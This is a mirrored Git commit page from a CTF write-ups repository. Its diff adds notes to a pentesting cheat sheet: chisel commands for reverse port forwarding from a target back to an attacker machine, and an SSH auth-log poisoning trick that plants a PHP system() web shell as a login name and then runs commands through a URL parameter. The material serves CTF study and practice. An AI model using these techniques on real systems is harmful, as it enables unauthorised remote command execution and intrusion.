Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-10 06:34:17 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update Cheat Sheet.md

Browse source
This commit is contained in:
ARZ 2021-03-20 11:39:52 +00:00 committed by GitHub
parent af3be40d54
commit 21c5e7ee71
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

7
Cheat Sheet.md
View file

@ -160,6 +160,13 @@ $ kill %1
Login as any user to see that it gets logged then try to login with a malicious php code
### Port Forwarding using chisel
On attacker machine `/chisel_1.7.6_linux_amd64 server -p <port to listen> --reverse`
On target machine `./chisel client <attacker>:<attacker_listening_port> R:localhost:<port to forward from target>`
### Poisining ssh auth log
`ssh '<?php system($_GET['a']); ?>'@192.168.43.2`
Then `http://ip/page?a=whoami;`